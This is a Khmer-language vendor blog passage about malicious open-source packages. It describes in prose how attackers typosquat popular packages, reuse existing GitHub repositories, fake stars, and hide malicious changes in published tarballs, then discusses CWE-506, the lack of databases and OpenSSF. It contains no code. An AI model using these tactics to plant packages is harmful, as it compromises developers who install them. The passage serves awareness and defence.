ប្រសិនបើកញ្ចប់ព្យាបាទវាយអក្សរខុសលើកញ្ចប់ដ៏ពេញនិយមមួយ នោះងាយស្រួលណាស់៖ គ្រាន់តែយោងទៅលើឃ្លាំង GitHub ដែលមានស្រាប់នៅក្នុងបញ្ជីឈ្មោះអាស្រ័យដែលប្រើសម្រាប់បង្កើតកញ្ចប់ និងបោះពុម្ពផ្សាយវាទៅក្នុងបញ្ជីឈ្មោះ។ សម្រាប់កញ្ចប់ថ្មីនៅលើឃ្លាំង GitHub ក្លែងក្លាយ អ្នកប្រហែលជាត្រូវការភាពប៉ិនប្រសប់បន្ថែមទៀត ប្រហែលជាការបង្កើតឃ្លាំងក្លែងក្លាយ ការមើលផ្កាយ/ការដើរកាត់ គណនី GitHub តាមរយៈការសរសេរស្គ្រីប។

ហើយប្រសិនបើខ្លឹមសារនៃកញ្ចប់របស់អ្នកមានលក្ខណៈស្រដៀងគ្នាទៅនឹង repo សូមដាក់ការផ្លាស់ប្តូរដែលរចនាយ៉ាងល្អមួយចំនួននៅទីនេះ និងទីនោះ... អ្នកអាចចាក់មេរោគរបស់អ្នកចូលទៅក្នុងកញ្ចប់ថ្មីដែលស្រដៀងនឹងកញ្ចប់ដ៏ពេញនិយមមួយដោយយោងទៅលើឃ្លាំងដែលមានស្រាប់ ហើយរង់ចាំកំហុសវាយអក្សរ។ ប្រសិនបើនរណាម្នាក់ហ៊ានប្រៀបធៀបខ្លឹមសារនៃកញ្ចប់ tarball ជាមួយនឹងខ្លឹមសារពីឃ្លាំង GitHub ភាពខុសគ្នានៅចំណុចចាក់មេរោគអាចត្រូវបានមើលរំលងយ៉ាងងាយស្រួល។ យើងបានឃើញវិធីសាស្រ្តនេះច្រើនដងពីមុន។ 

យន្តការមួយសម្រាប់សមាសធាតុមួយដើម្បីធ្វើសេចក្តីថ្លែងការណ៍ការពារការក្លែងបន្លំអំពីប្រភពដើម របៀបដែលកញ្ចប់ត្រូវបានបង្កើតឡើង ពីប្រភពណា និងដោយអ្នកណា ដែលត្រូវបានស្វាគមន៍។ ប៉ុន្តែនោះជារឿងមួយទៀត។ 

តើ​សមាសធាតុ X ជា​មេរោគ​មែន​ទេ?

តើមានមូលដ្ឋានទិន្នន័យ (ទូលំទូលាយ) នៃកញ្ចប់ព្យាបាទទេ? ទេ។ ចំណុចខ្សោយប្រភពបើកចំហមានលេខសម្គាល់ CVE ដែលបានកំណត់ ប៉ុន្តែមានតែកញ្ចប់ព្យាបាទមួយចំនួនតូចប៉ុណ្ណោះ (ជាពិសេសកញ្ចប់ដែលធ្វើឲ្យមានចំណងជើងព័ត៌មាន) ត្រូវបានផ្តល់ឱ្យ។ CWE សម្រាប់កញ្ចប់ព្យាបាទគឺ CWE-506 (កូដព្យាបាទដែលបានបង្កប់)។ 

ឧបករណ៍​មេរោគ​ធម្មតា (VirusTotal, MalwareBazaar, SOREL-20M…) មិន​បាន​ធ្វើ​បទប្បញ្ញត្តិ​ជាក់លាក់​សម្រាប់​សមាសធាតុ​មេរោគ​ទេ។ នោះ​ជា​ការ​ស្វាគមន៍!

មានមូលដ្ឋានទិន្នន័យគំរូស្រាវជ្រាវ និងសំណុំទិន្នន័យសម្រាប់ការវិភាគ (យើងប្រើមួយចំនួនក្នុងចំណោមពួកវា) ប៉ុន្តែធាតុត្រូវបានធ្វើបច្ចុប្បន្នភាពតែនៅពេលដែលកញ្ចប់ព្យាបាទត្រូវបានគេដឹង ដែលជារឿយៗយឺតពេលហើយ។ ​​ប្រសិនបើអ្នកចាប់អារម្មណ៍ OpenSSF កញ្ចប់ព្យាបាទ គឺជាការចាប់ផ្តើមដ៏ល្អមួយ។

នៅក្នុង​អត្ថបទ​បន្ទាប់ យើងនឹងពិភាក្សាអំពីរបៀបដឹងថាតើកញ្ចប់ណាមួយមានគ្រោះថ្នាក់ឬអត់។ សេចក្តី​សង្ខេប​៖ មែនហើយ មានវិធីដើម្បីពិនិត្យមើលសមាសធាតុដែលមានគ្រោះថ្នាក់តាំងពីដំបូងក្នុងអំឡុងពេលនៃការប៉ះពាល់ មុនពេលដែលបញ្ជីឈ្មោះលុបសមាសធាតុដែលមានគ្រោះថ្នាក់ដែលគេស្គាល់។

អានបន្ថែម

នៅក្នុងវគ្គបន្ទាប់ "ការការពារប្រឆាំងនឹងកញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ អ្វីដែល (មិន) ដំណើរការ" យើងនឹងពិភាក្សាអំពីអ្វីដែលគួរធ្វើ និងអ្វីដែលមិនគួរធ្វើសម្រាប់សុវត្ថិភាពប្រភពបើកចំហ។ អ្នកជំនាញភាគច្រើនដែលយល់ដឹងអំពីសុវត្ថិភាពមានវិចារណញាណអំពីរបៀបដោះស្រាយការគំរាមកំហែងនេះ ប៉ុន្តែការយល់ច្រឡំមានច្រើន។ 

យើងនឹងពិនិត្យឡើងវិញនូវមូលហេតុដែលគំនិតទាំងនេះខុស និងរបៀបដែលការយល់ច្រឡំបែបនេះរួមចំណែកដល់ប្រជាប្រិយភាពនៃយន្តការវាយប្រហារនេះ និងហានិភ័យដ៏លើសលប់ដែលអង្គការនានាកំពុងជួបប្រទះ។ បន្ទាប់មកយើងនឹងបន្តជាមួយនឹងអ្វីដែលដំណើរការ ហើយតើការខិតខំប្រឹងប្រែង និងធនធានដែលពាក់ព័ន្ធគឺជាអ្វី។ 

ដូចគ្នានេះដែរ យើងនឹងបង្ហោះអំពីការវិវត្តនៃកញ្ចប់ព្យាបាទទាក់ទងនឹងចេតនា យន្តការចាក់បញ្ចូល និងបច្ចេកទេសវាយប្រហាររបស់វា។

ចាំមើល!

ឯកសារយោង

កញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ បញ្ហា

ការការពារប្រឆាំងនឹងកញ្ចប់ព្យាបាទ OSS៖ អ្វីដែល (មិន) ដំណើរការ

ឧបករណ៍វិភាគសមាសភាពកម្មវិធី sca
ផ្តល់អាទិភាព ដោះស្រាយ និងធានាសុវត្ថិភាពហានិភ័យផ្នែកទន់របស់អ្នក
ទទួលបានគណនីឥតគិតថ្លៃរបស់អ្នក។
មិនតម្រូវឱ្យមានកាតឥណទានទេ។

ធានាសុវត្ថិភាពនៃការអភិវឌ្ឍន៍ និងការដឹកជញ្ជូនកម្មវិធីរបស់អ្នក

ជាមួយឈុតផលិតផល Xygeni